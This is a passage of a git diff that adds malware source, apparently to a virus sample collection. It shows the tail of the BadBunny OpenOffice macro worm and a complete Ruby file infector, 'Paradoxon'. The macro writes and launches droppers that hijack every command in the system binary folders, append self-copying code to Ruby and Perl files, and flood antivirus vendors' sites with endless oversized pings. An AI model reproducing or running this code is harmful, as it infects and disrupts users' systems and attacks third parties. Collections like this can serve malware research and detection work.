(<*>){open(File,$FileName);$chk = 1;while(){" +print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){" +print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}" +close #1 +cmd = "perl " & perlvir +shell(cmd,0) + +oDoc.store() +end sub + +sub mac() +Dim iVar As Integer +iVar = Int((15 * Rnd) -2) +Select Case iVar +Case 1 To 5 +call one +Case 6, 7, 8 +call two +Case Is > 8 And iVar < 11 +call one +Case Else +call two +End Select +end sub + +sub one () +'thx to skyout +Open "badbunny.rb" For Output As #1 +print #1,"#!/usr/bin/env ruby" +print #1,"require 'ftools'" +print #1,"def replacecmd(cmdname, dirpath)" +print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")" +print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)" +print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n""" +print #1,"oldcmd.puts ""puts \""\""" +print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\""""" +print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny""""" +print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut""" +print #1,"oldcmd.puts ""puts \""\""""" +print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\""""" +print #1,"oldcmd.puts ""puts \""Executing in ...\""""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""3\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""2\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""1\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""\""" +print #1,"oldcmd.puts ""for $args in $* do""" +print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\""" +print #1,"oldcmd.puts ""end""" +print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\""" +print #1,"oldcmd.puts ""exit 0""" +print #1,"end" +print #1,"$binary_dirs = Array.new" +print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]" +print #1,"for $dir in $binary_dirs do" +print #1,"if File.directory?($dir) then" +print #1,"if File.writable?($dir) then" +print #1,"Dir.open($dir).each do |file|" +print #1,"next if file =~ /^\S+_/ || file == ""."" || file == ""..""" +print #1,"replacecmd(file, $dir)" +print #1,"end" +print #1,"end" +print #1,"end" +print #1,"end" +print #1,"exit 0" +close #1 +Shell("badbunny.rb",0) +end sub + +sub two() 'thx to SPTH for this... +Open "badbunnya.rb" For Output As #2 +print #2,"# BADB" +print #2,"mycode=""" +print #2,"mych=File.open(__FILE__)" +print #2,"myc=mych.read(1)" +print #2,"while myc!=nil" +print #2,"mycode+=myc" +print #2,"myc=mych.read(1)" +print #2,"end" +print #2,"mycode=mycode[mycode.length-734,734]" +print #2,"cdir = Dir.open(Dir.getwd)" +print #2,"cdir.each do |a|" +print #2,"if File.ftype(a)==""file"" then" +print #2,"if a[a.length-3, a.length]=="".rb"" then" +print #2,"if a!=File.basename(__FILE__) then" +print #2,"fcode=""" +print #2,"fle=open(a)" +print #2,"badb=fle.read(1)" +print #2,"while badb!=nil" +print #2,"fcode+=badb" +print #2,"badb=fle.read(1)" +print #2,"end" +print #2,"fle.close" +print #2,"if fcode[fcode.length-732,4]!=""BADB"" then" +print #2,"fcode=fcode+13.chr+10.chr+mycode" +print #2,"fle=open(a,""w"")" +print #2,"fle.print fcode" +print #2,"fle.close" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"cdir.close" +close #2 +Shell("badbunnya.rb",0) +End Sub + +sub ping() +Shell("ping -l 5000 -t www.ikarus.at",0) +Shell("ping -l 5000 -t www.aladdin.com",0) +Shell("ping -l 5000 -t www.norman.no",0) +Shell("ping -l 5000 -t www.norman.com",0) +Shell("ping -l 5000 -t www.kaspersky.com",0) +Shell("ping -l 5000 -t www.kaspersky.ru",0) +Shell("ping -l 5000 -t www.kaspersky.pl",0) +Shell("ping -l 5000 -t www.grisoft.cz",0) +Shell("ping -l 5000 -t www.symantec.com",0) +Shell("ping -l 5000 -t www.proantivirus.com",0) +Shell("ping -l 5000 -t www.f-secure.com",0) +Shell("ping -l 5000 -t www.sophos.com",0) +Shell("ping -l 5000 -t www.arcabit.pl",0) +Shell("ping -l 5000 -t www.arcabit.com",0) +Shell("ping -l 5000 -t www.avira.com",0) +Shell("ping -l 5000 -t www.avira.de",0) +Shell("ping -l 5000 -t www.avira.ro",0) +Shell("ping -l 5000 -t www.avast.com",0) +Shell("ping -l 5000 -t www.virusbuster.hu",0) +Shell("ping -l 5000 -t www.trendmicro.com",0) +Shell("ping -l 5000 -t www.bitdefender.com",0) +Shell("ping -l 5000 -t www.pandasoftware.comm",0) +Shell("ping -l 5000 -t www.drweb.com",0) +Shell("ping -l 5000 -t www.drweb.ru",0) +Shell("ping -l 5000 -t www.viruslist.com",0) +end sub \ No newline at end of file diff --git a/Ruby/Virus.Ruby.Pydoxon.b b/Ruby/Virus.Ruby.Pydoxon.b new file mode 100644 index 00000000..92417383 --- /dev/null +++ b/Ruby/Virus.Ruby.Pydoxon.b @@ -0,0 +1,26 @@ +# RUBY.Paradoxon +mycode=File.open(__FILE__).read(630) +cdir = Dir.open(Dir.getwd) + cdir.each do |a| + if File.ftype(a)=="file" then + if a[a.length-3, a.length]==".rb" then + if a!=File.basename(__FILE__) then + fcode="" + fle=open(a) + spth=fle.read(1) + while spth!=nil + fcode+=spth + spth=fle.read(1) + end + fle.close + if fcode[7,9]!="Paradoxon" then + fcode=mycode+13.chr+10.chr+fcode + fle=open(a,"w") + fle.print fcode + fle.close + end + end + end + end + end +cdir.close \ No newline at end of file